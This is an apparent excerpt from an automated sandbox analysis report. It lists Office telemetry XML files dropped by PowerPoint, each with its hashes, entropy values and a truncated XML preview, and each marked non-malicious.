                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1377
                                                                                                                              Entropy (8bit):4.869487277433382
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9A6DSuMt1k3BNjXMi+EsdnKE+2h6wl/FfqRjJNk:ceaSuMteNjXMzbdKshBdyRjJC
                                                                                                                              MD5:D563C8B0249B69D9FEDE0952EB0C3C5C
                                                                                                                              SHA1:2FAB9B0EA578383F7CADEAC43119C1144973A6E9
                                                                                                                              SHA-256:A2A28812A62146DEA0D8560E316B06933DBAE3EE9830F2A7B37E3657F1F90803
                                                                                                                              SHA-512:B25437A3545EBD14AE0C0E73487671F5A70568483635588C315851E200EAF2C260CEEBE3A2FFD2D377F469D03F1538399B995F8EB00B889BF2FEB9B6E21E29C7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703700" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCard" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaCard" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="f
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1414
                                                                                                                              Entropy (8bit):4.902951734564792
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zIJDSuct1k3BNjXMi+EsdnKE+2h6wl/FfqRjJNk:cRIZSucteNjXMzbdKshBdyRjJC
                                                                                                                              MD5:D179C943A3CE7C71D98AE9D316D44EE0
                                                                                                                              SHA1:87181E44F0427F40B448BA5F5FB5D04529A2925E
                                                                                                                              SHA-256:A17B805BC4F3EED671B69876DB1A89BC19CA4A306707672919FEBE3725BFD0FD
                                                                                                                              SHA-512:8739CBA564703EA74D32E38BDD94FB766434F2D873465EDF52A85B5BA8DA871155173CFB3C55BAA50F67D2DD6AB8837972887AAE0EDDA79C3B5D189962AFFF95
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703701" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCard.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaCard" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1399
                                                                                                                              Entropy (8bit):4.898773611960046
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9p0D4uMt1k3BNjXMi+EsdnKE+2h6wl/Ff+V8E:c/o4uMteNjXMzbdKshBdTE
                                                                                                                              MD5:DB17844E55942774E1889C0F89CB33D4
                                                                                                                              SHA1:27E6275660DDCC8834BB339D7DF4E73478745196
                                                                                                                              SHA-256:7DF652C2790E1FDF16E030B9EE6286DCCB429E36C80E2CFFADC92DE576893444
                                                                                                                              SHA-512:16DDD00E6161833D881D397BC6EA1356B458A55D3CD815D63A8CE65D5D824302D2CCB8E91DE914FF42D11602E2ECCEB9B864DA267EDC29758294D7064C94621F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703750" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCardUserActions" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaCardUserActions" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1436
                                                                                                                              Entropy (8bit):4.929467842574553
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d924D4uct1k3BNjXMi+EsdnKE+2h6wl/Ff+V8E:csc4ucteNjXMzbdKshBdTE
                                                                                                                              MD5:9ECC80BB2FF6C61C59B9368F34A7FCE2
                                                                                                                              SHA1:CB866F2D3ADF0BEAF7301784A03BC07B48756ACB
                                                                                                                              SHA-256:BD0D504A09D5745DB2C1866F08D8D391972C0256ED97A6FA8E326FC7DF5BC36A
                                                                                                                              SHA-512:0F9093498487D91A2E84E7AE864143AEF0031C308915914D5FD67585E31FCAE01745D1B6CD8B74725D6CD01C7218BD2B258AA2EDE3DDC4CAECE6388D2FE49823
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703751" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCardUserActions.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaCardUserActions" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1381
                                                                                                                              Entropy (8bit):4.889079229821002
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9xGDmuMt1k3BNjXMi+EsdnKE+2h6wl/Ff+c:czWmuMteNjXMzbdKshBdmc
                                                                                                                              MD5:0579512EEFB11E803D2CF5019B8150D7
                                                                                                                              SHA1:86086FD8D862B2C243E29F89D3E344A908A36B42
                                                                                                                              SHA-256:C3CF94AD2BE85D20575195602902F5EB3862B92A56E25C628A0F2EC8F8233338
                                                                                                                              SHA-512:876A87B3BC0E1AAE525B569E648FFF2EE8BD87864ADCAA6A834DFE78129D2055C9111516890B6B2732760873065815946AD75AB190325ABD0A5C4AA24DF6037F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703800" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaPicker" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1418
                                                                                                                              Entropy (8bit):4.921065578166547
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9++Dmuct1k3BNjXMi+EsdnKE+2h6wl/Ff+c:cAOmucteNjXMzbdKshBdmc
                                                                                                                              MD5:B2EA0FAAC79444CB793E4C999F5CCD94
                                                                                                                              SHA1:2C83F03CA96B58E00DA42BAA4ACA9B45B2410528
                                                                                                                              SHA-256:A7A890DF0CC1E3B29A6CC66FBDDB8CE28223A3E3405B360B65CFA740BD1C6052
                                                                                                                              SHA-512:143F8456F89F338D2BD136BDB60440B99CC49954C4045BAAA8F4A3B9C4D384F952FAB5696C46F7B85A3856E4F667438395502746A8157CC5569196A8105E0822
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703801" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaPicker" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContra
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.9085076597309225
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9ogJDMuMt1k3BNjXMi+EsdnKE+2h6wl/Ff48z5l:cqOMuMteNjXMzbdKshBdddl
                                                                                                                              MD5:93CD889E0520AC00A54903F2023267FA
                                                                                                                              SHA1:2837F1B19D5431374D4BBBB8C25F34289EF6D0CE
                                                                                                                              SHA-256:5165B4D3461B52C51B82B52099B5C43950A3CF918507D080E170D2D383E63E6B
                                                                                                                              SHA-512:463A502EB0C6783C9C440ED275C0019BF7C2D1CBAB89B58FF075ACE1D6BB38937C5ABCD519CE2CA79FA0B73C8674F3839E9383FBA901F5759ECB548C2C4DDFFB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703850" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.UserActions" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaPickerUserActions" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1441
                                                                                                                              Entropy (8bit):4.938740750695626
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9bgjDMuct1k3BNjXMi+EsdnKE+2h6wl/Ff48z5l:ctWMucteNjXMzbdKshBdddl
                                                                                                                              MD5:BA77A847F8C91B20E9D25B8C95E73A09
                                                                                                                              SHA1:C57A8549318B0373EF2D2C2F1048B2A0A21CCE22
                                                                                                                              SHA-256:889C789156B4E363814DEDD7B91C3A536E8AD55EF18A59D6CB886828136CE6C8
                                                                                                                              SHA-512:33A58C7487191F193291F0E28B0913ED4EF63F91758A32EB3400367CA008A7BBD1A9A25A000DC4137EC712D25D73BC2574C6A68AB03255C23C4D37028FE59C19
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703851" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.UserActions.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLivePersonaPickerUserActions" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1389
                                                                                                                              Entropy (8bit):4.879092955369256
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9W+d7DiDuMt1k3BNjXMi+EsdnKE+2h6wl/FffmEj:cYgQuMteNjXMzbdKshBdXbj
                                                                                                                              MD5:2DCC31926D121AC271F9826708601148
                                                                                                                              SHA1:31E2CF7E0875B51F61E442470E9A0F9E7EFB085B
                                                                                                                              SHA-256:431C879A0838C65C792183D23BBC9B79292D5CDFB10869D2A12CB25D2BFAB271
                                                                                                                              SHA-512:0FED34754EFB09AB16F1B7946DE9A0C460D58768B81E98A35D08D0BD8D27BF61618042A10903040CF10AF0137A599266229B1C498B658F981B2E3CDB08C227F2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1426
                                                                                                                              Entropy (8bit):4.912185438232315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d902f+7DiDuct1k3BNjXMi+EsdnKE+2h6wl/FffmEj:cLfEQucteNjXMzbdKshBdXbj
                                                                                                                              MD5:E137206782A64799CFE71598CFC0E274
                                                                                                                              SHA1:04F35055C6314D4A174D9B246EA722769DF352FD
                                                                                                                              SHA-256:D396F94786A116D5ADD114308B712F9EA80A2D4CA6461A7904278AF0C77BA224
                                                                                                                              SHA-512:7EB478A86D5BC1D12771D9B4F0E6994C640D7F63E6D2B99E135D1D8BB19ABB5E441C0C0FEBF2CF1A3260DDB8D661CBFFD53450DC876179841E8A0C6E820AC594
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.860514751542863
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d93RDvuMt1k3BNjXMi+EsdnKE+2h6wl/FfQ6YiW:chhvuMteNjXMzbdKshBdCiW
                                                                                                                              MD5:D0DE499215C43B263D29D8792084B221
                                                                                                                              SHA1:81248A3E1CB557868FE563DF7D50FAB362102714
                                                                                                                              SHA-256:4DD6609F46C919E5328820FBD0F4D2821E7B816C10DBDADD77B3F8C77453773D
                                                                                                                              SHA-512:1513FE90213D3295513EE0A594CB23BD816B02C4641FDA9D38FBC598F189CA54FE388F2BFA07BF4D64775EE06601419C21D9414144F75E22A48D1FFEF76760A9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703950" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Floodgate" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFloodgate" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.8964130495018665
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9EbDvuct1k3BNjXMi+EsdnKE+2h6wl/FfQ6YiW:cunvucteNjXMzbdKshBdCiW
                                                                                                                              MD5:1BED13AF260A25C341B88834C49F7BDB
                                                                                                                              SHA1:73112A338E4EA6A2B110D92E914955BB3A86C0E7
                                                                                                                              SHA-256:70264E80F11549C63AE55D534D690A3CCA6C9DF17303DD4F6E759060FEACF058
                                                                                                                              SHA-512:47EB73AB6CC6A918A6D694AD6995827EBBE3815E66836F4EF1C01FAA93BF52D579299B89788C407C3A3515C8B2D937C14A5DF920396C25075E745F9674DC2404
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703951" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Floodgate.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFloodgate" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1381
                                                                                                                              Entropy (8bit):4.881737011521532
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9yTDluMt1k3BNjXMi+EsdnKE+2h6wl/Ffgp2i:cAfluMteNjXMzbdKshBdY8i
                                                                                                                              MD5:A88E3E9B0F81BA54B760FCE5ED9D387A
                                                                                                                              SHA1:0E7C2382DD2CA6E1BA77948D517357D000ADDF14
                                                                                                                              SHA-256:A478FED1246A705770CFA224A6684CC9A57563865BE16EEBCF4551E4097BD0E9
                                                                                                                              SHA-512:A324FBF06CBAD813386820901D0FB6230389CB430482477853AD35FD16031B8C75C997B5DA6C8608E454C06FFF0C40BB501135A0DD88113EEB7A54247EC77824
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704000" V="0" DC="SM" EN="Office.Telemetry.Event.Office.DiagnosticsSystem" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDiagnosticsSystem" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1418
                                                                                                                              Entropy (8bit):4.914410926227558
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d91QODluct1k3BNjXMi+EsdnKE+2h6wl/Ffgp2i:czQ+lucteNjXMzbdKshBdY8i
                                                                                                                              MD5:54E386392B8B5FB83174CAF60681280B
                                                                                                                              SHA1:2645B59A6068CF22F7D599F65FFD3293505C9F85
                                                                                                                              SHA-256:5CE5FB59264E0720FD55EA20A722C25F6572FA2A613A9474C4831BD6C7EF64C6
                                                                                                                              SHA-512:1C7BF0DCDF58FADD08B37A44048AF6FCDC05D19BE6ED03091F385738FF3204E88FD627FD2FDCC05BE80C3E23B299ECDFD00FAD43356A1317D0CF270571F96DF5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704001" V="0" DC="SM" EN="Office.Telemetry.Event.Office.DiagnosticsSystem.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDiagnosticsSystem" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContra
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.854080661479833
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9bOD2uMt1k3BNjXMi+EsdnKE+2h6wl/Ffox4dVXHj:cp+2uMteNjXMzbdKshBdfLXj
                                                                                                                              MD5:04CFF2F72C92D2045E147E0C596E1406
                                                                                                                              SHA1:554F906AA205C9F8BFF0F903F2C2728158754E06
                                                                                                                              SHA-256:F3944740EFBC7263F1B3CD168B05096C89128F250859D4669372C9B182102D9A
                                                                                                                              SHA-512:4D289411E4B2E6085E388ED7C4C07530575E1F564BD2739678BB0F95A50587DFF104983FB275F39F0D9BE3EF910C7BE2126B3880A53004644514AA7B6F467257
                                                                                                                              Malicious:false
